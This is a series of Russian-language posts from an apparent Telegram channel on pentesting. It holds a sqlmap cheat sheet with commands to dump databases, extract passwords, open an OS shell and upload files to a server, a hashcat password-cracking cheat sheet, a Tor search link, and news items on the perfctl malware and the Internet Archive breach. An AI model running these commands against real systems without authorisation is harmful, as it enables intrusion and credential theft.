🔐 Шпаргалка по использованию sqlmap

SQLMAP — это инструмент для проникновения с открытым исходным кодом.

SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .

Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.

🌟 Базовый скан URL на наличие уязвимостей:

sqlmap -u "http://example.com/page.php?id=1"

🌟 Автоматический дамп всех баз данных:

sqlmap -u "http://example.com/page.php?id=1" --dbs

🌟 Извлечение таблиц из конкретной базы данных:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables

🌟 Извлечение данных из конкретной таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump

🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"

🌟 Подбор базы данных и получение информации о пользователях:

sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user

🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:

sqlmap -u "http://example.com/page.php?id=1" --os-shell

🌟 Выполнение SQL-запросов вручную:

sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"

🌟 Проверка на возможность подключения с правами администратора:

sqlmap -u "http://example.com/page.php?id=1" --is-dba

🌟 Брутфорсирование паролей пользователей:

sqlmap -u "http://example.com/page.php?id=1" --passwords

🌟 Загрузка файла на удаленный сервер:

sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"

🌟 Получение списка столбцов из таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns

🌟 Использование прокси-сервера:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

🌟 Определение используемой базы данных и версии:

sqlmap -u "http://example.com/page.php?id=1" --banner

🌟 Атака на POST-запросы (если параметры передаются в теле):

sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"

@linuxkalii

🔐 Hashcat — это мощный инструмент для взлома паролей с помощью методов перебора и атаки на хэши

🌟 Hashcat предустановлен на Kali Linux

💡 Вот небольшая шпаргалка по основным командам:

💻 Базовая команда:

hashcat [параметры] [хэши] [словарь/маска]

⚙️ Основные параметры:

-m — Тип хэша:

0 — MD5
100 — SHA-1
1400 — SHA-256
1800 — SHA-512
1000 — NTLM (Windows)

-a — Тип атаки:

0 — словарная атака
1 — комбинированная атака
3 — маска (брутфорс)
6 — словарь + маска
7 — маска + словарь
--help — выводит справку по командам и параметрам.

--show — показывает уже найденные пароли из предыдущих атак.

--status — показывает прогресс текущей атаки.

🔐 Примеры использования
Словарная атака (Dictionary Attack):

```shell
hashcat -m 0 -a 0 hashes.txt wordlist.txt```
-m 0 — указывает тип хэша (MD5).
-a 0 — указывает тип атаки (словарь).
hashes.txt — файл с хэшами.
wordlist.txt — словарь с возможными паролями.

🌟 Брутфорс по маске (Brute-Force Mask Attack):

hashcat -m 1000 -a 3 hash.txt ?d?d?d?d?d

?d — любая цифра (0-9).
Маска ?d?d?d?d?d — ищет 5-значные пароли (например, 12345).
Маски:

?d — цифры (0-9)
?l — строчные буквы (a-z)
?u — прописные буквы (A-Z)
?s — символы (!, @, #, и т.д.)
?a — любые символы

🌟 Комбинированная атака (Combination Attack):

hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt

wordlist1.txt и wordlist2.txt — словари, которые комбинируются для подбора пароля.

🌟 Атака словарь + маска (Hybrid Attack):

hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d

Применяет маску ?d?d к каждому слову из wordlist.txt. Например, password превратится в password00, password01, и т.д.

🌟 Использование собственного правила:

hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

-r rules/best64.rule — применяет правила трансформации к каждому слову в словаре (например, добавление цифр или символов к слову)

https://www.kali.org/tools/hashcat/

@linuxkalii

🔐 Быстрый Совет дня: Как узнать, когда последний раз кто то входил в систему на этом устройстве?

❕

Просто введите что то из этого:

$ last {имя}

🌟 Команда last покажет все входы в систему
🌟 Команда last Name покажет все входы в систему пользователя Name
🌟 Чтобы отобразить только несколько последних входов, используйте last | less

@linuxkalii

🧅 ahmia.fi — мощная поисковая система в сети Tor

🌟 Ищет любые .onion ссылки.

🔗 Ссылка: *клик*

@linuxkalii

🥷 Вредоносная программа для Linux под названием «perfctl» атакует серверы и рабочие станции Linux уже как минимум три года, оставаясь практически незамеченной благодаря высокому уровню уклонения и использованию руткитов

🌟 Основная цель perfctl — криптомайнинг, использование скомпрометированных серверов для добычи трудноотслеживаемой криптовалюты Monero. Однако его можно легко использовать для более разрушительных операций

🌟 При запуске perfctl открывает сокет Unix для внутренних коммуникаций и устанавливает зашифрованный канал с серверами злоумышленника через TOR, что делает невозможным расшифровку обмена.

🌟 Затем он устанавливает руткит под названием «libgcwrap.so», который подключается к различным системным функциям для изменения механизмов аутентификации и перехвата сетевого трафика по мере необходимости для облегчения обхода системы безопасности.

💡 Также развертываются дополнительные пользовательские руткиты, заменяющие утилиты ldd, top, crontab и lsof троянизированными версиями, что опять же препятствует прямому обнаружению активности вредоносного ПО.

🌟 Наконец, в систему устанавливается майнер XMRIG, который запускается для майнинга Monero с использованием ресурсов ЦП сервера

@linuxkalii

🔐 Поисковые системы для пентестеров!

@linuxkalii

🖥 Ставь палец вверх, если не знал!

#мем

@linuxkalii

🥷 Киберпреступники взломали крупнейший архив мирового интернета!

💡 Киберпреступникам удалось взломать известный сайт Internet Archive, похитив данные 31 миллиона пользователей. В среду, 9 октября, на основном домене веб-архива появился всплывающий баннер с сообщением о «катастрофическом нарушении безопасности». Этот факт позже был подтверждён, а сам сайт перестал функционировать

🌟 Во всплывающем сообщении говорилось: «Чувствуете, что Internet Archive всегда был на грани катастрофического взлома? Что ж, это случилось. Ищите себя на HIBP!». Речь, судя по всему, шла о сайте Have I Been Pwned, известном в сфере безопасности ресурсом, предупреждающим о компрометации данных, что намекает на утечку огромного объёма пользовательской информации.

🌟 Эксперт по кибербезопасности Трой Хант, основатель HIBP, подтвердил факт взлома. Хакеры сами отправили ему базу данных объёмом 6.4 ГБ, содержащую информацию о 31 миллионе учётных записей, включая электронные адреса, имена пользователей и хешированные пароли. Пользователи могут проверить на HIBP, были ли они затронуты утечкой

@linuxkalii

❓ А как называется такой вид кибератак?

@linuxkalii

💡 Awesome browser exploit

Большой список полезных материалов по эксплойтам браузеров.

Эксплойты браузера описывают любую форму вредоносного кода, целью которого является манипулирование благими намерениями пользователя, что достигается за счет использования встроенных недостатков программного обеспечения.

Я только начинаю собирать то, что смог найти, и я только начинающий в этом деле.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

▪ Github

@linuxkalii